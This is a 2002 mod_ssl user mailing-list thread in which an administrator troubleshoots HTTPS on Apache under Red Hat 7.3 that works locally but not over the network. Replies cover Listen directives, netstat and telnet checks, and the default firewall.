  with SMTP id 25563688 for modssl-users@modssl.org; Mon, 05 Aug 2002 17:58:47 -0400
From: "Alicianiah L. Cherry" 
To: 
Subject: RE: Problem Connecting via https Over Network and Internet
Date: Mon, 5 Aug 2002 18:04:13 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: <3D4EE2DB.4040905@itaction.co.uk>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Alicianiah L. Cherry" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have the listen entry as LISTEN 443.  I tried the netstat command and the
output is as follows:

tcp		0	0 0.0.0.0:443			0.0.0.0:*		LISTEN

It appears to me that port 443 is not listening (I'm new at Linux).  Also,
when I tried to telnet to port 443, the connection failed. Do I need to
specifically open port 443 in some manner other than editing the httpd.conf
file?  If so, how?

Alicia

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Peter Viertel
Sent: Monday, August 05, 2002 4:41 PM
To: modssl-users@modssl.org
Subject: Re: Problem Connecting via https Over Network and Internet


sorry if this is a little obvious but maybe you are not listening on all
interfaces as a result of your config file... check you have a Listen
443 rather than Listen hostname:443 - when apache is running see if
somethings LISTENing by doing:

netstat -an |grep LISTEN|grep 443

and make sure you're either listening on *:443 or  {yourip}:443 not
127.0.0.1:443


for diagnosis i find it helps to bypass the weirdness of the browsers
and use something more simple to check connectivity - no harm in
telnetting to port 443 directly and hitting enter a couple of times -
see the error log output after you do this to confirm you've got the
right server process listening on that port.  Next step is to check SSL
with  a SSL enabled curl, or even the openssl command is capable of
connecting you to a https server (see openssl FAQ).

with curl you can display the certificate details returned which can be
quite helpful in testing scripts - one thing is for sure though, it
doesnt matter a jot what common name the cert was made for, SSL should
still be able to complete negotiations..

also go into IE 'advanced settings' and turn of that stooopid 'show
friendly HTTP error messages' tickbox - this will at least stop most of
the 'DNS' error messages, at least if you are getting an error from the
webserver you will see it then.... that message is second only to the
talking paperclip in my M$ hate-list .

Alicianiah Cherry wrote:

>Thanks for responding.  The certificate was issued to the ip address of my
>server (not localhost or 127.0.0.1).  Netscape just returns the message
>that the connection was not able to be established.  I also get the error
>message in IE, "Cannot Find Server or DNS Error".  There is not much
>information in the error message that is returned by the browsers.
>
>Alicia  Cherry
>
>-----Original Message-----
>From:	Maurizio Marini [SMTP:maumar@datalogica.com]
>Sent:	Monday, August 05, 2002 3:31 PM
>To:	modssl-users@modssl.org
>Subject:	Re: Problem Connecting via https Over Network and Internet
>
>you haven't reported any  detail about Netscape error, so it's hard to help
>u;
>without knowing anything related your probem, i suggest you to create a
>cert
>issued not to localhot.localdomain; but for the ServerName u are using.
>It's self-signed, of course; but netscape deny access to a server
>presenting a
>cert intitled to something already visited.
>maybe u have another cert for localhos.localdomain.
>the only way to get help is provide details.
>
>-- maumar
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>
>I have Red Hat v 7.3 Professional installed with Apache 1.3.23 and mod_ssl
>2.8.7.  I have made a test certificate per the Red Hat manual instructions.
> I can access the https web pages with Netscape on the server itself, but I
>am unable to connect to the https pages over the internal network or over
>the network.  I also have a Win2k server running that also uses SSL, and
>have no problems connecting to that server via https using Netscape.  Any
>suggestions?
>
>Alicia Cherry
>Systems Administrator
>RiverStone Counseling
>cherryal@riverstone.halifaxnc.com
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 00:11:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA29622; Tue, 6 Aug 2002 00:10:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from schoollink.net id AAA29614; Tue, 6 Aug 2002 00:10:05 +0200 (MET DST)
Received: from [216.4.140.142] (HELO alawrence)
  by schoollink.net (CommuniGate Pro SMTP 3.5.9)
  with SMTP id 25563921 for modssl-users@modssl.org; Mon, 05 Aug 2002 18:03:31 -0400
From: "Alicianiah L. Cherry" 
To: 
Subject: RE: Problem Connecting via https Over Network and Internet
Date: Mon, 5 Aug 2002 18:08:58 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: <200208060002.15181.maumar@datalogica.com>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Alicianiah L. Cherry" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I am able to access a Win2K server using ssl.  Also, I am not able to access
the server over the internal network, negating a firewall issue, I would
think.  However, it was suggested to me that I try the netstat command, and
the output is as follows:
tcp		0	0 0.0.0.0:443			0.0.0.0:*		LISTEN

Seems like port 443 is not listening.  I have the LISTEN entry in httpd.conf
as LISTEN 443. Is there something else I need to do open 443 and make it
listen?

Thanks,

Alicia



-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Maurizio Marini
Sent: Monday, August 05, 2002 6:02 PM
To: modssl-users@modssl.org
Subject: Re: Problem Connecting via https Over Network and Internet


 "There was no response. The server could be down
> or is not responding."

firewall?
-- maumar

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 00:19:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA29801; Tue, 6 Aug 2002 00:18:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id AAA29790; Tue, 6 Aug 2002 00:17:23 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g75MEVlo015237
	for ; Mon, 5 Aug 2002 18:14:31 -0400
Date: Mon, 5 Aug 2002 18:14:31 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: RE: Problem Connecting via https Over Network and Internet
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 5 Aug 2002, Alicianiah L. Cherry wrote:

> tcp	0  0    0.0.0.0:443    0.0.0.0:*    LISTEN
>
> Seems like port 443 is not listening.

Actually the presence of that line in the netstat output means exactly the
opposite... it *is* listening.  The 0.0.0.0 means it's listening on all
interfaces.  LISTEN tells you that the socket is in the listening state.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 00:33:31 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA00047; Tue, 6 Aug 2002 00:32:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from schoollink.net id AAA00040; Tue, 6 Aug 2002 00:32:09 +0200 (MET DST)
Received: from [216.4.140.142] (HELO alawrence)
  by schoollink.net (CommuniGate Pro SMTP 3.5.9)
  with SMTP id 25564749 for modssl-users@modssl.org; Mon, 05 Aug 2002 18:25:35 -0400
From: "Alicianiah L. Cherry" 
To: 
Subject: RE: Problem Connecting via https Over Network and Internet
Date: Mon, 5 Aug 2002 18:31:02 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: 
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Alicianiah L. Cherry" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Why would a telnet connection to port 443 be refused?  Any suggestions?

Thanks,

Alicia

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Cliff Woolley
Sent: Monday, August 05, 2002 6:15 PM
To: modssl-users@modssl.org
Subject: RE: Problem Connecting via https Over Network and Internet


On Mon, 5 Aug 2002, Alicianiah L. Cherry wrote:

> tcp	0  0    0.0.0.0:443    0.0.0.0:*    LISTEN
>
> Seems like port 443 is not listening.

Actually the presence of that line in the netstat output means exactly the
opposite... it *is* listening.  The 0.0.0.0 means it's listening on all
interfaces.  LISTEN tells you that the socket is in the listening state.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 01:15:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA01002; Tue, 6 Aug 2002 01:14:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id BAA00995; Tue, 6 Aug 2002 01:13:11 +0200 (MET DST)
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id H0E8HZ00.4B6 for ; Tue, 6 Aug 2002
          00:13:11 +0100 
Message-ID: <3D4F0685.1030401@itaction.co.uk>
Date: Tue, 06 Aug 2002 00:13:09 +0100
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0+) Gecko/20020430
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Problem Connecting via https Over Network and Internet
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Ah! we have seen this before with redhat - when you install it, you get 
the option to configure a firewall with iptables, and maybe it seemed 
like a good idea at the time - its got to be the problem - your netstat 
shows the LISTEN and some unixes do show 0.0.0.0 instead of the * that 
I'm used to on Suns so there *is* something listening but the telnet 
shows its not visible from the outside of the network stack...

I'm not a redhat sorta guy, but millions are - anyone else know where 
the redhat iptables config files are?

Alicianiah L. Cherry wrote:

>Why would a telnet connection to port 443 be refused?  Any suggestions?
>
>Thanks,
>
>Alicia
>
>-----Original Message-----
>From: owner-modssl-users@modssl.org
>[mailto:owner-modssl-users@modssl.org]On Behalf Of Cliff Woolley
>Sent: Monday, August 05, 2002 6:15 PM
>To: modssl-users@modssl.org
>Subject: RE: Problem Connecting via https Over Network and Internet
>
>
>On Mon, 5 Aug 2002, Alicianiah L. Cherry wrote:
>
>  
>
>>tcp	0  0    0.0.0.0:443    0.0.0.0:*    LISTEN
>>
>>Seems like port 443 is not listening.
>>    
>>
>
>Actually the presence of that line in the netstat output means exactly the
>opposite... it *is* listening.  The 0.0.0.0 means it's listening on all
>interfaces.  LISTEN tells you that the socket is in the listening state.
>
>--Cliff
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 03:13:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA04039; Tue, 6 Aug 2002 03:12:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id DAA03958; Tue, 6 Aug 2002 03:11:07 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id VAA11631;
	Mon, 5 Aug 2002 21:14:02 -0400
Date: Mon, 5 Aug 2002 21:14:02 -0400 (EDT)
From: "R. DuFresne" 
To: "Alicianiah L. Cherry" 
cc: modssl-users@modssl.org
Subject: RE: Problem Connecting via https Over Network and Internet
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Yes, then it does not sound like a DNS issue like you posted before.  It
appears https is not actually running on the server.  This might well be
due to missing or incorrect config info in the httpd.conf file.  Do you
have a listen statement for the ip:443 port combo in the file?

Thanks,

Ron DuFresne

On Mon, 5 Aug 2002, Alicianiah L. Cherry wrote:

> Http connections work fine.  It's just the https connections that are not
> working.  I am entering the actual ip address of the server to access the
> pages, as I do not have the ip address registered. If it were a DNS issue,
> would not the http connections be effected as well? By the way, the exact
> message from Netscape is "There was no response. The server could be down or
> is not responding."
> 
> Thanks,
> 
> Alicia
> 
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of R. DuFresne
> Sent: Monday, August 05, 2002 4:24 PM
> To: Alicianiah Cherry
> Cc: 'modssl-users@modssl.org'
> Subject: RE: Problem Connecting via https Over Network and Internet
> 
> 
> 
> first, your apache and ssl source looks old, upgrade, there are security
> reasons for the upgrade need.
> 
> "Cannot Find Server or DNS Error", is usually related to DNS issues, means
> you prolly do not have DNS setup correctly, ot that you have not
> registered the domain in question, the short 'testing' workabout is to try
> the IP address in question, not the domain name.
> 
> Thanks,
> 
> Ron DuFresne
> 
> On Mon, 5 Aug 2002, Alicianiah Cherry wrote:
> 
> > Thanks for responding.  The certificate was issued to the ip address of my
> > server (not localhost or 127.0.0.1).  Netscape just returns the message
> > that the connection was not able to be established.  I also get the error
> > message in IE, "Cannot Find Server or DNS Error".  There is not much
> > information in the error message that is returned by the browsers.
> >
> > Alicia  Cherry
> >
> > -----Original Message-----
> > From:	Maurizio Marini [SMTP:maumar@datalogica.com]
> > Sent:	Monday, August 05, 2002 3:31 PM
> > To:	modssl-users@modssl.org
> > Subject:	Re: Problem Connecting via https Over Network and Internet
> >
> > you haven't reported any  detail about Netscape error, so it's hard to
> help
> > u;
> > without knowing anything related your probem, i suggest you to create a
> > cert
> > issued not to localhot.localdomain; but for the ServerName u are using.
> > It's self-signed, of course; but netscape deny access to a server
> > presenting a
> > cert intitled to something already visited.
> > maybe u have another cert for localhos.localdomain.
> > the only way to get help is provide details.
> >
> > -- maumar
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
> 
> --
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>         admin & senior security consultant:  sysinfo.com
>                         http://sysinfo.com
> 
> "Cutting the space budget really restores my faith in humanity.  It
> eliminates dreams, goals, and ideals and lets us get straight to the
> business of hate, debauchery, and self-annihilation."
>                 -- Johnny Hart
> 
> testing, only testing, and damn good at it too!
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 03:14:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA04083; Tue, 6 Aug 2002 03:13:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id DAA04066; Tue, 6 Aug 2002 03:12:34 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id VAA11644;
	Mon, 5 Aug 2002 21:15:30 -0400
Date: Mon, 5 Aug 2002 21:15:29 -0400 (EDT)
From: "R. DuFresne" 
To: "Alicianiah L. Cherry" 
cc: modssl-users@modssl.org
Subject: RE: Problem Connecting via https Over Network and Internet
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



I should work, but only if you do https://localhost, you seen to have 443
open on the loopback port.  Did you try changing this to the IP address
for the system?

Thanks,

Ron DuFresne

On Mon, 5 Aug 2002, Alicianiah L. Cherry wrote:

> I have the listen entry as LISTEN 443.  I tried the netstat command and the
> output is as follows:
> 
> tcp		0	0 0.0.0.0:443			0.0.0.0:*		LISTEN
> 
> It appears to me that port 443 is not listening (I'm new at Linux).  Also,
> when I tried to telnet to port 443, the connection failed. Do I need to
> specifically open port 443 in some manner other than editing the httpd.conf
> file?  If so, how?
> 
> Alicia
> 
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Peter Viertel
> Sent: Monday, August 05, 2002 4:41 PM
> To: modssl-users@modssl.org
> Subject: Re: Problem Connecting via https Over Network and Internet
> 
> 
> sorry if this is a little obvious but maybe you are not listening on all
> interfaces as a result of your config file... check you have a Listen
> 443 rather than Listen hostname:443 - when apache is running see if
> somethings LISTENing by doing:
> 
> netstat -an |grep LISTEN|grep 443
> 
> and make sure you're either listening on *:443 or  {yourip}:443 not
> 127.0.0.1:443
> 
> 
> for diagnosis i find it helps to bypass the weirdness of the browsers
> and use something more simple to check connectivity - no harm in
> telnetting to port 443 directly and hitting enter a couple of times -
> see the error log output after you do this to confirm you've got the
> right server process listening on that port.  Next step is to check SSL
> with  a SSL enabled curl, or even the openssl command is capable of
> connecting you to a https server (see openssl FAQ).
> 
> with curl you can display the certificate details returned which can be
> quite helpful in testing scripts - one thing is for sure though, it
> doesnt matter a jot what common name the cert was made for, SSL should
> still be able to complete negotiations..
> 
> also go into IE 'advanced settings' and turn of that stooopid 'show
> friendly HTTP error messages' tickbox - this will at least stop most of
> the 'DNS' error messages, at least if you are getting an error from the
> webserver you will see it then.... that message is second only to the
> talking paperclip in my M$ hate-list .
> 
> Alicianiah Cherry wrote:
> 
> >Thanks for responding.  The certificate was issued to the ip address of my
> >server (not localhost or 127.0.0.1).  Netscape just returns the message
> >that the connection was not able to be established.  I also get the error
> >message in IE, "Cannot Find Server or DNS Error".  There is not much
> >information in the error message that is returned by the browsers.
> >
> >Alicia  Cherry
> >
> >-----Original Message-----
> >From:	Maurizio Marini [SMTP:maumar@datalogica.com]
> >Sent:	Monday, August 05, 2002 3:31 PM
> >To:	modssl-users@modssl.org
> >Subject:	Re: Problem Connecting via https Over Network and Internet
> >
> >you haven't reported any  detail about Netscape error, so it's hard to help
> >u;
> >without knowing anything related your probem, i suggest you to create a
> >cert
> >issued not to localhot.localdomain; but for the ServerName u are using.
> >It's self-signed, of course; but netscape deny access to a server
> >presenting a
> >cert intitled to something already visited.
> >maybe u have another cert for localhos.localdomain.
> >the only way to get help is provide details.
> >
> >-- maumar
> >
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >
> >
> >I have Red Hat v 7.3 Professional installed with Apache 1.3.23 and mod_ssl
> >2.8.7.  I have made a test certificate per the Red Hat manual instructions.
> > I can access the https web pages with Netscape on the server itself, but I
> >am unable to connect to the https pages over the internal network or over
> >the network.  I also have a Win2k server running that also uses SSL, and
> >have no problems connecting to that server via https using Netscape.  Any
> >suggestions?
> >
> >Alicia Cherry
> >Systems Administrator
> >RiverStone Counseling
> >cherryal@riverstone.halifaxnc.com
> >
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 03:17:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA04292; Tue, 6 Aug 2002 03:16:07 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id DAA04281; Tue, 6 Aug 2002 03:15:42 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id VAA11662;
	Mon, 5 Aug 2002 21:18:36 -0400
Date: Mon, 5 Aug 2002 21:18:36 -0400 (EDT)
From: "R. DuFresne" 
To: Peter Viertel 
cc: modssl-users@modssl.org
Subject: Re: Problem Connecting via https Over Network and Internet
In-Reply-To: <3D4F0685.1030401@itaction.co.uk>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


I believe they are located under the /etc/initd or /etc/rc directories as
the firewall is uppped on boot.  

Thanks,

Ron DuFresne

On Tue, 6 Aug 2002, Peter Viertel wrote:

> Ah! we have seen this before with redhat - when you install it, you get 
> the option to configure a firewall with iptables, and maybe it seemed 
> like a good idea at the time - its got to be the problem - your netstat 
> shows the LISTEN and some unixes do show 0.0.0.0 instead of the * that 
> I'm used to on Suns so there *is* something listening but the telnet 
> shows its not visible from the outside of the network stack...
> 
> I'm not a redhat sorta guy, but millions are - anyone else know where 
> the redhat iptables config files are?
> 
> Alicianiah L. Cherry wrote:
> 
> >Why would a telnet connection to port 443 be refused?  Any suggestions?
> >
> >Thanks,
> >
> >Alicia
> >
> >-----Original Message-----
> >From: owner-modssl-users@modssl.org
> >[mailto:owner-modssl-users@modssl.org]On Behalf Of Cliff Woolley
> >Sent: Monday, August 05, 2002 6:15 PM
> >To: modssl-users@modssl.org
> >Subject: RE: Problem Connecting via https Over Network and Internet
> >
> >
> >On Mon, 5 Aug 2002, Alicianiah L. Cherry wrote:
> >
> >  
> >
> >>tcp	0  0    0.0.0.0:443    0.0.0.0:*    LISTEN
> >>
> >>Seems like port 443 is not listening.
> >>    
> >>
> >
> >Actually the presence of that line in the netstat output means exactly the
> >opposite... it *is* listening.  The 0.0.0.0 means it's listening on all
> >interfaces.  LISTEN tells you that the socket is in the listening state.
> >
> >--Cliff
> >
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >  
> >
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 04:39:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA05623; Tue, 6 Aug 2002 04:38:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from iris.lab.te.sia.it id EAA05612; Tue, 6 Aug 2002 04:37:12 +0200 (MET DST)
Received: from iris (IDENT:lhQlsrXjxs2IZN5bDcviCuEYUhaTfRvq@localhost.localdomain [127.0.0.1])
	by iris.lab.te.sia.it (8.11.6/8.11.6) with ESMTP id g762bLj15945
	for ; Tue, 6 Aug 2002 02:37:22 GMT
Content-Type: text/plain;
  charset="iso-8859-1"
From: Maurizio Marini 
To: modssl-users@modssl.org
Subject: Re: Problem Connecting via https Over Network and Internet
Date: Tue, 6 Aug 2002 04:37:19 +0200
User-Agent: KMail/1.4.1
References: 
In-Reply-To: 
MIME-Version: 1.0
Message-Id: <200208060437.19435.maumar@datalogica.com>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id EAA05615
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Maurizio Marini 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> negating a firewall issue, I would think.

why do u thik this? have you tried to clear your firewall rules, before to say 
this? if not, do it issuing as root: # ipchains -F input
by default RedHat 7.3 install ipchains
in any case, send us output of  ipchains -L -n (or the output of iptables -L 
-n if u have configured iptables in your box)


-- maumar

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 04:43:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA05729; Tue, 6 Aug 2002 04:42:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
